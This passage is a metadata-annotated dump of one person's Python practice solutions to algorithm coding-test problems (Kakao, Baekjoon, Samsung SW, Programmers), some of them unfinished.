"src_encoding": "UTF-8", "text": "def permu(arr):\n\tif len(arr) == 1:\n\t\treturn [arr]\n\telse:\n\t\tresult = []\n\t\tfor i in arr:\n\t\t\t" }, { "alpha_fraction": 0.43529412150382996, "alphanum_fraction": 0.4588235318660736, "avg_line_length": 14.904762268066406, "blob_id": "1b2a1cc021465a3eec947573c866943c4db57a2c", "content_id": "2faa71f5abf3b03d04322eaee3e372b5ab89dd41", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 340, "license_type": "no_license", "max_line_length": 24, "num_lines": 21, "path": "/programas/점프와순간이동.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "def solution(n):\n ans = 0 \n ans = dp(n)\n return ans\n\ndef decorator_dp(func):\n d={}\n def wrapper(n):\n if n not in d:\n d[n]=func(n)\n return d[n]\n return wrapper\n\n@decorator_dp\ndef dp(n):\n if n==1:\n return 1\n if n%2 == 0:\n return dp(n/2)\n else:\n return dp(n-1)+1\n\n \n" }, { "alpha_fraction": 0.37139421701431274, "alphanum_fraction": 0.4375, "avg_line_length": 22.11111068725586, "blob_id": "571f21be058355480ed624bdd55570bd326c6870", "content_id": "bad7dea53efd3bca974fc83f28d36efd43011341", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 832, "license_type": "no_license", "max_line_length": 106, "num_lines": 36, "path": "/kakao/숫자야구.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "def solution(baseball):\n answer = 0\n plist = [str(i) + str(j) + str(k) for i in range(1, 10) for j in range(1, 10) for k in range(1, 10) if\n i != j and i != k and j != k]\n\n for p in plist:\n state=0\n for b in baseball:\n if compare(b[0],p)==(b[1],b[2]):\n state+=1\n\n if state==len(baseball):\n answer+=1\n\n return answer\n\n\ndef compare(s, o):\n strike = 0\n ball = 0\n s = str(s)\n o = str(o)\n for i in range(3):\n if s[i] == o[i]:\n strike += 1\n if s[0] == o[1] or s[0] == o[2]:\n ball += 1\n if s[1] == o[0] or s[1] == o[2]:\n ball += 1\n if s[2] == o[0] or s[2] == o[1]:\n ball += 1\n return (strike, ball)\n\n\nbaseball = [[123, 1, 1], [356, 1, 0], [327, 2, 0], [489, 0, 1]]\nprint(solution(baseball))\n" }, { "alpha_fraction": 0.44626864790916443, "alphanum_fraction": 0.4820895493030548, "avg_line_length": 20.645160675048828, "blob_id": "2b44d8d490fc2043866c76ced5731839a7c47938", "content_id": "63985a484af4300b6b3b8b41bd6250642d975c21", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 670, "license_type": "no_license", "max_line_length": 37, "num_lines": 31, "path": "/kakao/뉴스 클러스터링.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "def solution(str1,str2):\n answer=0\n Set_list=[]\n for str in (str1,str2):\n str=str.upper()\n before=str[0]\n a=[]\n for s in str[1:]:\n a.append(before+s)\n before=s\n Set_list.append(a)\n\n U,N=[],[]\n for _ in range(len(Set_list[0])):\n i=Set_list[0].pop(0)\n U.append(i)\n if i in Set_list[1]:\n N.append(i)\n Set_list[1].remove(i)\n for _ in range(len(Set_list[1])):\n i=Set_list[1].pop(0)\n U.append(i)\n\n answer=int(len(N)/len(U)*65536)\n return answer\n\n\nif __name__==\"__main__\":\n str1='FRANCE'\n str2='french'\n print(solution(str1,str2))" }, { "alpha_fraction": 0.3855421543121338, "alphanum_fraction": 0.4879518151283264, "avg_line_length": 14.090909004211426, "blob_id": "a3fd432ac9ab511c013eaa8fa54333b97b8f5286", "content_id": "74e456012b706809b328cf4de51b5a809249bb72", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 166, "license_type": "no_license", "max_line_length": 33, "num_lines": 11, "path": "/백준/날짜 계산_1476.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "E,S,M = map(int,input().split())\ne,s,m = 0,0,0\ny = 1\nwhile True:\n\tif e+1==E and s+1==S and m+1==M:\n\t\tprint(y)\n\t\tbreak\n\ty+=1\n\te = (e+1)%15\n\ts = (s+1)%28\n\tm = (m+1)%19\n" }, { "alpha_fraction": 0.5268199443817139, "alphanum_fraction": 0.5478927493095398, "avg_line_length": 19.920000076293945, "blob_id": "e6f71a8241b8bfe00b3160255b3943e6dea5fc27", "content_id": "0d68333b8e1c6c4054fcd6a2ef5aec3ac0df6a80", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 602, "license_type": "no_license", "max_line_length": 50, "num_lines": 25, "path": "/kakao/실패율.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "# 실패율\n# 스테이지 도달했으나 아직 클리어하지 못한 플레이어의 수/ 스테이지에 도달한 플레이어 수\nfrom sys import stdin\ninput=stdin.readline\n\n\ndef solution(N, stages):\n answer = []\n\n f={}\n histogram=[0 for _ in range(N+2)]\n for stage in stages:\n histogram[stage]+=1\n for i in range(1,N+1):\n fail=histogram[i]/sum(histogram[i:])\n try:\n f[fail].append(i)\n except:\n f[fail]=[i]\n while f:\n for i in f.pop(max(f)):\n answer.append(i)\n return answer\n\nprint(solution(4,[4,4,4,4,4]))" }, { "alpha_fraction": 0.34378379583358765, "alphanum_fraction": 0.36000001430511475, "avg_line_length": 21.0238094329834, "blob_id": "ce8c6fc17bb237053cb60ae06cd9eb31f05d3e84", "content_id": "2a8b21773275629dee7cea0f84564a53cc6f4d27", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 925, "license_type": "no_license", "max_line_length": 35, "num_lines": 42, "path": "/kakao/다트게임.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "def solution(dartResult):\n answer=0\n\n a=[]\n state=''\n for s in dartResult:\n state += s\n if s=='#' or s=='*':\n a[-1]+=state\n state=''\n elif not (s.isnumeric()):\n a.append(state)\n state=''\n\n answer_ = []\n for a_ in a:\n for a__ in a_:\n if a__.isnumeric():\n score=int(a__)\n elif a__=='S':\n score**=1\n elif a__=='D':\n score**=2\n elif a__=='T':\n score**=3\n elif a__=='#':\n score*=-1\n if len(answer_)>0:\n answer_[-1]*=-1\n elif a__=='*':\n score*=2\n answer_*=2\n answer_.append(score)\n score=0\n answer=sum(answer_)\n\n return answer\n\n\nif __name__ ==\"__main__\":\n dartResult='1S2D*3T'\n print(solution(dartResult))\n" }, { "alpha_fraction": 0.4900990128517151, "alphanum_fraction": 0.5099009871482849, "avg_line_length": 24.375, "blob_id": "d2140807595cf96875be437537082fb2743ed6ad", "content_id": "13e691d0417f7c973d2b0f82a0d4ec9c6e6c7d7f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 202, "license_type": "no_license", "max_line_length": 64, "num_lines": 8, "path": "/삼성SW/10200.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "import sys\n\nT = int(input())\nfor test_case in range(1, T + 1):\n N,A,B = map(int,input().split())\n M = min(A,B)\n m = max(A+B-N,0)\n print(\"#{} {} {}\".format(test_case, min(A,B), max(A+B-N,0)))" }, { "alpha_fraction": 0.42082110047340393, "alphanum_fraction": 0.4692082107067108, "avg_line_length": 23.39285659790039, "blob_id": "09c7e8e838b85c0933478cba8121596054a2cf8e", "content_id": "5171ca751d0e3bf559090bd9b666071b2e9b3f90", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 690, "license_type": "no_license", "max_line_length": 48, "num_lines": 28, "path": "/kakao/카페트.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "def solution(brown, red):\n answer = []\n red_list=[[],[]] #가로, 세로\n for i in range(1,red+1):\n if red%i==0:\n if not i in red_list[0]:\n red_list[1].append(i)\n red_list[0].append(red//i)\n for row,col in zip(red_list[0],red_list[1]):\n p_brown=0\n i=-1\n while True:\n if p_brown>=brown:\n break\n else:\n i+=1\n p_brown+=2*(row+i)+2*(col+i)+4\n\n if p_brown==brown:\n return [row+2*(1+i),col+2*(1+i)]\n\n return answer\n\nprint(solution(10,2))\nprint(solution(8,1))\nprint(solution(24,24))\nprint(solution(16,9))\n# print(solution(10,2))" }, { "alpha_fraction": 0.6096823215484619, "alphanum_fraction": 0.6248108744621277, "avg_line_length": 24.461538314819336, "blob_id": "ad51c5739d14eee7b44d6b9f621e18debe97431c", "content_id": "f412809ccadd5a80e3580ac625820649843d708f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 661, "license_type": "no_license", "max_line_length": 59, "num_lines": 26, "path": "/백준/외판원 순회 2_10971.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "n=int(input())\nnums = list(map(int,input().split()))\nadd, sub, multi, division = list(map(int,input().split()))\nmaxv = -float('inf')\nminv = float('inf')\n\ndef cal(num, idx, add, sub, multi, division):\n\tglobal n, maxv, minv\n\tif idx == n:\n\t\tmaxv = max(num, maxv)\n\t\tminv = min(num, minv)\n\t\treturn\n\n\telse:\n\t\tif add:\n\t\t\tcal(num + nums[idx], idx+1, add-1, sub, multi, division)\n\t\tif sub:\n\t\t\tcal(num - nums[idx], idx+1, add, sub-1, multi, division)\n\t\tif multi:\n\t\t\tcal(num * nums[idx], idx+1, add, sub, multi-1, division)\n\t\tif division:\n\t\t\tcal(num/nums[idx], idx+1, add, sub, multi, division-1)\n\ncal(nums[0], 1, add, sub,multi,division)\nprint(int(maxv))\nprint(int(minv))" }, { "alpha_fraction": 0.4661921560764313, "alphanum_fraction": 0.5338078141212463, "avg_line_length": 15.529411315917969, "blob_id": "474f57e6a2f6b52d3146a6190d2acb0a4bac82fe", "content_id": "1c13b43a3ab14111caf49532d59d71a1730f2b46", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 281, "license_type": "no_license", "max_line_length": 39, "num_lines": 17, "path": "/kakao/셔틀버스_완성x.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "def solution(n,t,m,timetable):\n answer=''\n StartTime='09:00'\n busTime=[]\n for i in range(n):\n busTime.append(i*m)\n\n\n return answer\n\n\nif __name__=='__main__':\n n=1\n t=1\n m=5\n timetable=['08:00','08:02','08:03']\n print(solution(n,t,m,timetable))\n" }, { "alpha_fraction": 0.37714284658432007, "alphanum_fraction": 0.3942857086658478, "avg_line_length": 14.909090995788574, "blob_id": "c5e75d874742c3b22563eb3661171219fdad57ad", "content_id": "79eedc53eecd844e4e802322dd345168e2638afd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 175, "license_type": "no_license", "max_line_length": 21, "num_lines": 11, "path": "/programas/숫자게임.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "def solution(A, B):\n answer = 0\n A.sort()\n B.sort()\n while A:\n a= A.pop()\n if B[-1]> a:\n answer+=1\n B.pop()\n\n return answer\n" }, { "alpha_fraction": 0.5579710006713867, "alphanum_fraction": 0.6521739363670349, "avg_line_length": 16.375, "blob_id": "f77f72e8c5357ccf86b0b9d8bb627c13b9637938", "content_id": "3aa563b35e45fdce35b2ef053b8fafc069dd3fd6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 138, "license_type": "no_license", "max_line_length": 28, "num_lines": 8, "path": "/kakao/큰수만들기x.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "def solution(number, k):\n answer = ''\n length=len(number)\n\n return answer\n\nprint(solution('1924',2))\nprint(solution('1231234',3))" }, { "alpha_fraction": 0.4925742447376251, "alphanum_fraction": 0.5037128925323486, "avg_line_length": 18.261905670166016, "blob_id": "316924b0053c3a1ec6cd4d62b77f28d1e7df07a0", "content_id": "00dc66c9ec5dc4c3bec8dd007fa367567173247b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 808, "license_type": "no_license", "max_line_length": 45, "num_lines": 42, "path": "/kakao/소수 찾기.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "li=[]\ndef solution(numbers):\n answer=0\n numbers_list=list(numbers)\n\n visited=[]\n for i in range(len(numbers_list)):\n permut(i,0,len(numbers_list),visited)\n\n n=set()\n for p in li:\n s=''\n for p_ in p:\n s+=numbers_list[p_]\n n.add(int(s))\n print(n)\n for s in n:\n if is_prime(s):\n answer+=1\n return answer\n\ndef permut(curr,depth,D,visited):\n if depth==D:\n return\n else:\n visited.append(curr)\n li.append(visited[:])\n\n for i in range(D):\n if not(i in visited):\n permut(i,depth+1,D,visited)\n visited.pop()\n\ndef is_prime(n):\n if n<=1:\n return False\n for i in range(2,n):\n if n%i==0:\n return False\n return True\n\nprint(solution('99'))" }, { "alpha_fraction": 0.6184210777282715, "alphanum_fraction": 0.6293859481811523, "avg_line_length": 15.925926208496094, "blob_id": "828da45b5a64e03d184b81f0d4c8c401601561ab", "content_id": "21b4f7a11af5ed4a1fb07c0947fdcc868f841f35", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 456, "license_type": "no_license", "max_line_length": 31, "num_lines": 27, "path": "/백준/연결 요소의 개수_11724.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "N,M= map(int,input().split())\ng={n+1:[] for n in range(N)}\nfor m in range(M):\n\tu,v = map(int,input().split())\n\tg[u].append(v)\n\tg[v].append(u)\n\ndef bfs(graph, start):\n\tvisited =set()\n\n\tqueue=[start]\n\twhile queue:\n\t\tnode = queue.pop()\n\n\t\tif node not in visited:\n\t\t\tvisited.add(node)\n\t\t\tqueue.extend(graph[node])\n\n\treturn visited\n\nvisited=set()\nresult = 0 \nfor n in range(1,N+1):\n\tif n not in visited:\n\t\tresult +=1\n\t\tvisited = visited | bfs(g,n)\nprint(result)" }, { "alpha_fraction": 0.5660130977630615, "alphanum_fraction": 0.5699346661567688, "avg_line_length": 20.27777862548828, "blob_id": "2cb8125ba797deb734c350dd2d7426606e1f8c24", "content_id": "1f4e4badd40565cf6d8c601604e4f3652f266893", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 765, "license_type": "no_license", "max_line_length": 94, "num_lines": 36, "path": "/kakao/조이스틱.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "import sys\ndef solution(name):\n answer = 0\n v_list=[]\n visited=[]\n length=len(name)\n\n for i in range(length):\n answer+=min(ord(name[i])-ord('A'),ord('Z')+1-ord(name[i]))\n if name[i]!='A':\n v_list.append(i)\n\n start=0\n while True:\n if len(v_list)==len(visited):\n break\n d=[cal_distance(start,j,length) if not(j in visited) else sys.maxsize for j in v_list]\n answer+=min(d)\n next=v_list[d.index(min(d))]\n visited.append(next)\n start=next\n\n return answer\n\ndef cal_distance(i,j,length):\n return min(abs(j-i),length-j+i)\n\n\nprint(solution('JEROEN'))\nprint(solution('JAN'))\n# print(solution('ABAAAAAAN'))\nprint(solution('AAACAN'))\n\n\n# print(ord('A'))\n# print(ord('Z'))" }, { "alpha_fraction": 0.521276593208313, "alphanum_fraction": 0.5265957713127136, "avg_line_length": 12.285714149475098, "blob_id": "ac03502ad08058c37412bf749e64c008c79a2e96", "content_id": "fa909f76a85b5db977ac1c3bac82ddc5eecada20", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 188, "license_type": "no_license", "max_line_length": 31, "num_lines": 14, "path": "/백준/최소공배수_1934.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "def gcd(a,b):\n\twhile b!=0:\n\t\tr = a%b\n\t\ta = b\n\t\tb = r\n\treturn a\n\ndef lcm(a,b):\n\treturn a*b//gcd(a,b)\n\nT = int(input())\nfor t in range(T):\n\ta,b = map(int,input().split())\n\tprint(lcm(a,b))\n\n\n" }, { "alpha_fraction": 0.8125, "alphanum_fraction": 0.8125, "avg_line_length": 23, "blob_id": "293fc1c091d446a491c6fe0a057311f216456679", "content_id": "15f327bda4d0f864e4b6977a34aac570158535ae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 48, "license_type": "no_license", "max_line_length": 24, "num_lines": 2, "path": "/README.md", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "# coding_test_practice\npractice for coding test\n" }, { "alpha_fraction": 0.48677247762680054, "alphanum_fraction": 0.49735450744628906, "avg_line_length": 16.18181800842285, "blob_id": "7548ea32e24fdae3b3745620e63a14d317436d94", "content_id": "30a69037aa39e2fc92f84d419f89df0054ea6fdf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 189, "license_type": "no_license", "max_line_length": 33, "num_lines": 11, "path": "/삼성SW/10202.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "T = int(input())\nfor t in range(T):\n\tN = int(input())\n\tA = input()\n\tB = input()\n\tC = input()\n\tans = 0\n\tfor a,b,c in zip(A,B,C):\n\t\tans += len(set([a,b,c])\n\n\tprint(\"#{} {}\".format(t+1, ans))\n" }, { "alpha_fraction": 0.518855631351471, "alphanum_fraction": 0.5552665591239929, "avg_line_length": 24.633333206176758, "blob_id": "cfb545563d4e7daed467786d9d6f11729011d941", "content_id": "be06cc1afe3fb6fa5114518caa2e23ea113db63d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 769, "license_type": "no_license", "max_line_length": 184, "num_lines": 30, "path": "/kakao/후보키_완성x.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "combination=[]\n\ndef solution(relation):\n answer = 0\n row = len(relation) #data num\n col=len(relation[0]) #attribute\n keys=[]\n result=[]\n for i in range(col):\n dfs(i, col, result)\n\n # comb= sorted(combination, key=len)\n print(combination)\n return answer\n\ndef dfs(curr, size, result):\n if curr==size:\n return\n else:\n result.append(curr)\n combination.append(result[:])\n\n for i in list(range(curr+1,size+1)):\n dfs(i,size,result)\n result.pop()\n\n\nif __name__ == '__main__':\n relation=[[\"100\",\"ryan\",\"music\",\"2\"],[\"200\",\"apeach\",\"math\",\"2\"],[\"300\",\"tube\",\"computer\",\"3\"],[\"400\",\"con\",\"computer\",\"4\"],[\"500\",\"muzi\",\"music\",\"3\"],[\"600\",\"apeach\",\"music\",\"2\"]]\n answer=solution(relation)\n" }, { "alpha_fraction": 0.5186335444450378, "alphanum_fraction": 0.590062141418457, "avg_line_length": 22.071428298950195, "blob_id": "fb1d792b15074ed60a36164384a0bc80aa360d8e", "content_id": "09bb374781aa6551b5972e91259d71128f780ca0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 322, "license_type": "no_license", "max_line_length": 52, "num_lines": 14, "path": "/kakao/H-index.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "def solution(citations):\n answer = 0\n for i in range(len(citations)+1):\n num=sum(1 if x>=i else 0 for x in citations)\n if num<i:\n return answer\n answer=i\n\n return answer\n\nprint(solution([3,0,6,1,5]))\nprint(solution([10,100]))\nprint(solution([6,6,6,6,6,6]))\nprint(solution([2,2,2]))" }, { "alpha_fraction": 0.31081080436706543, "alphanum_fraction": 0.4285714328289032, "avg_line_length": 17.5, "blob_id": "def35c5f1514db2724952bbc3c963ccff7644b64", "content_id": "e7c482b3b5e270e2e090b3b24da572571f5cdde9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 518, "license_type": "no_license", "max_line_length": 35, "num_lines": 28, "path": "/kakao/비밀지도.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "def solution(n,arr1,arr2):\n answer=[]\n for i in range(len(arr1)):\n bw=bin(arr1[i]|arr2[i])[2:]\n a=''\n for s in bw:\n if s=='0':\n a+=' '\n else:\n a+='#'\n answer.append(a)\n\n return answer\n\n\n\nif __name__ == \"__main__\":\n #1\n n=5\n arr1=[9,20,28,18,11]\n arr2=[30,1,21,17,28]\n print(solution(n,arr1,arr2))\n\n #2\n n=6\n arr1=[46, 33, 33 ,22, 31, 50]\n arr2=[27 ,56, 19, 14, 14, 10]\n print(solution(n,arr1,arr2))\n" }, { "alpha_fraction": 0.5539568066596985, "alphanum_fraction": 0.5827338099479675, "avg_line_length": 18.928571701049805, "blob_id": "58643b39acf1d8ff7d41417a326387fc3b877081", "content_id": "9d9356bc70c8bae6b2caf2cc38de21a7be72d39b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 278, "license_type": "no_license", "max_line_length": 36, "num_lines": 14, "path": "/백준/N과 M7_15656.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "N,M = map(int,input().split())\nseq = list(map(int,input().split()))\nseq.sort()\n\ndef re(num, count, visited):\n\tif count == M:\n\t\tprint(' '.join(map(str,visited)))\n\t\treturn\n\t\n\tfor i in range(1,N+1):\n\t\tre(i, count+1, visited+[seq[i-1]])\n\nfor i in range(1,N+1):\n\tre(i, 1, [seq[i-1]])" }, { "alpha_fraction": 0.5240963697433472, "alphanum_fraction": 0.5301204919815063, "avg_line_length": 10.928571701049805, "blob_id": "cae9eee71e18e5e5f7ecb60e84539eb04895e12d", "content_id": "4eeb91a8d410971c9aa791377e4436d4a17d1a98", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 166, "license_type": "no_license", "max_line_length": 30, "num_lines": 14, "path": "/백준/최대공약수와 최소공배수_2609.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "a,b = map(int,input().split())\n\ndef gcd(a,b):\n\twhile b!=0:\n\t\tr = a%b\n\t\ta = b\n\t\tb = r\n\treturn a\n\ndef lcm(a,b):\n\treturn a*b // gcd(a,b)\n\nprint(gcd(a,b))\nprint(lcm(a,b))" }, { "alpha_fraction": 0.3484201431274414, "alphanum_fraction": 0.36891546845436096, "avg_line_length": 21.960784912109375, "blob_id": "3bf38af161317a7a4d743c26d007b71e6dafcd01", "content_id": "b52a1ec95d310cbedfdc99a8e430f8290dfb114f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1171, "license_type": "no_license", "max_line_length": 43, "num_lines": 51, "path": "/kakao/프렌즈4블록.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "\ndef solution(m,n,board):\n answer=0\n b=[]\n for s in board:\n s=list(s)\n b.append(s)\n\n collision=find(m,n,b)\n while len(collision)!=0:\n collision = find(m, n, b)\n for cor in collision:\n idx=cor[0]\n idy=cor[1]\n b[idx][idy]='-'\n answer+=1\n for i in range(m-1):\n for j in range(n-1):\n try:\n if b[i][j]=='-':\n b[i][j]=b[i-1][j]\n b[i-1][j]='-'\n except:\n pass\n return answer\n\ndef find(m,n,board):\n l=set()\n for i in range(m-1):\n for j in range(n-1):\n a=board[i][j]\n b=board[i][j+1]\n c=board[i+1][j]\n d=board[i+1][j+1]\n if a==b==c==d!='-':\n l.add((i,j))\n l.add((i+1,j))\n l.add((i,j+1))\n l.add((i+1,j+1))\n\n return l\ndef move(i,j):\n if board[i][j+1]!='-':\n return\n b[i][j+1]==b[i][j]\n move(i,j+1)\n\nif __name__==\"__main__\":\n m=4\n n=5\n board=['CCBDE','AAADE','AAABF','CCBBF']\n print(solution(m,n,board))" }, { "alpha_fraction": 0.46732836961746216, "alphanum_fraction": 0.4921422600746155, "avg_line_length": 24.14583396911621, "blob_id": "3d7140139ffdb798c939f005659d4043e75309fc", "content_id": "c9c0f321eed1dccb224b5cb24c4a0103fc4c472a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1259, "license_type": "no_license", "max_line_length": 118, "num_lines": 48, "path": "/kakao/채팅방.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "from sys import stdin\ninput=stdin.readline\n\ndef preprocessing(record):\n li=[]\n l=''\n for s in record:\n if s.isalnum():\n l+=s\n else:\n if l.isalnum():\n li.append(l)\n l=''\n return li\n\n\ndef solution(record):\n answer = []\n events=[]\n dict={}\n for i,s in enumerate(record):\n if s=='Enter':\n id=record[i+1]\n name=record[i+2]\n dict[id]=name\n events.append([s,id])\n elif s=='Leave':\n id = record[i + 1]\n name = record[i + 2]\n events.append([s,id])\n elif s=='Change':\n id = record[i + 1]\n name = record[i + 2]\n dict[id]=name\n\n for event in events:\n if event[0]=='Enter':\n answer.append('{}님이 들어왔습니다.'.format(dict[event[1]]))\n elif event[0] =='Leave':\n answer.append('{}님이 나갔습니다.'.format(dict[event[1]]))\n\n return answer\n\nif __name__ == '__main__':\n # record = input()\n record='[“Enter uid1234 Muzi”, “Enter uid4567 Prodo”,”Leave uid1234”,”Enter uid1234 Prodo”,”Change uid4567 Ryan”]'\n record = preprocessing(record)\n answer=solution(record)\n\n\n" }, { "alpha_fraction": 0.612500011920929, "alphanum_fraction": 0.6333333253860474, "avg_line_length": 14.0625, "blob_id": "65394bf169bf599cb2f543fb8b636180fea69c07", "content_id": "c360fcd85bec0dd1d47fcc760919d4497171ac49", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 240, "license_type": "no_license", "max_line_length": 37, "num_lines": 16, "path": "/백준/소수 찾기_1978.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "def is_PrimeNumber(n):\n\tif n==1:\n\t\treturn False\n\t\n\tfor i in range(2,n):\n\t\tif n%i ==0:\n\t\t\treturn False\n\treturn True\n\nN=int(input())\nnums = list(map(int,input().split()))\ncount = 0\nfor n in nums:\n\tif is_PrimeNumber(n):\n\t\tcount+=1\nprint(count)" }, { "alpha_fraction": 0.42114385962486267, "alphanum_fraction": 0.45753899216651917, "avg_line_length": 21.230770111083984, "blob_id": "01ba275d85f2fd3b41332ba92139bbf9d9d89faa", "content_id": "4c3854b17f47d68787ab0f1e52bbe126597aaa24", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 577, "license_type": "no_license", "max_line_length": 53, "num_lines": 26, "path": "/백준/골드바흐의 추측_6588.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "MAX=1000000\nprime=[False for _ in range(MAX+1)]\n\nfor i in range(2, MAX+1):\n if i*i > MAX:\n break\n if prime[i] is False:\n for j in range(i*i, MAX+1, i):\n prime[j] = True\n\nwhile True:\n n= int(input())\n if n ==0:\n break\n \n check=True\n for p1 in range(2,MAX+1):\n if prime[p1] is False:\n p2= n-p1\n \n if prime[p2] is False:\n print(\"{} = {} + {}\".format(n,p1,p2))\n check=False\n break\n if check:\n print(\"Goldbach's conjecture is wrong.\")" }, { "alpha_fraction": 0.5959821343421936, "alphanum_fraction": 0.6071428656578064, "avg_line_length": 14.482758522033691, "blob_id": "f109b96c7cc814ae123da405080d1dd0d306e5a6", "content_id": "0065ef3dd2e87b6e606d06473729d8929ede8b96", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 448, "license_type": "no_license", "max_line_length": 49, "num_lines": 29, "path": "/백준/ABCDE_13023.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "N, M = map(int, input().split())\nd={i:[] for i in range(N)}\n\nstate = False\ndef dfs(node, count, visited):\n\tglobal state\n\tif state:\n\t\treturn\n\n\tif count == 5:\n\t\tstate = True\n\t\treturn\n\t\n\tfor next_node in d[node]:\n\t\tif next_node not in visited:\n\t\t\tdfs(next_node, count+1, visited + [next_node])\n\nfor i in range(M):\n\ta,b = map(int, input().split())\n\td[a].append(b)\n\td[b].append(a)\n\nfor i in range(M):\n\tdfs(i, 1, [i])\n\nif state:\n\tprint(1)\nelse:\n\tprint(0)" }, { "alpha_fraction": 0.475862056016922, "alphanum_fraction": 0.5034482479095459, "avg_line_length": 16.058822631835938, "blob_id": "573a84edfbea0d65c2bc6561211beacf2b6fdce1", "content_id": "0d3854bcbd8bde78b1a4d6f3bc66f9265b39e90d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 290, "license_type": "no_license", "max_line_length": 42, "num_lines": 17, "path": "/삼성SW/10204.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "T = int(input())\nfor t in range(T):\n\tN = int(input())\n\ti = []\n\tans = 0\n\n\tfor n in range(N):\n\t\ti.append(list(map(int,input().split())))\n\ti.sort(key=lambda x:(x[0]+x[1]))\n\t\n\tfor n in range(N):\n\t\tif n%2 == 0:\n\t\t\tans += i.pop()[0]\n\t\telse:\n\t\t\tans -= i.pop()[1]\n\n\tprint(\"#{} {}\".format(t+1,ans))\n" }, { "alpha_fraction": 0.45077720284461975, "alphanum_fraction": 0.4663212299346924, "avg_line_length": 18.299999237060547, "blob_id": "490343ef3cad3a4da3edbb9dc091e73e541585ac", "content_id": "49e5af732400f2cb218893fee1fca6453f55055e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 193, "license_type": "no_license", "max_line_length": 27, "num_lines": 10, "path": "/programas/예산.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "def solution(d, budget):\n answer = 0\n d.sort(key=lambda x:-x)\n while d:\n budget -= d.pop()\n if budget <0:\n break\n answer +=1\n \n return answer\n" }, { "alpha_fraction": 0.633156955242157, "alphanum_fraction": 0.6366842985153198, "avg_line_length": 17.322580337524414, "blob_id": "abdb5fba3f1cf91fc08ca6124e69ba69e3c45639", "content_id": "5aa2b747481e60c2197cca82c10dd326668aa728", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 567, "license_type": "no_license", "max_line_length": 42, "num_lines": 31, "path": "/백준/DFS와 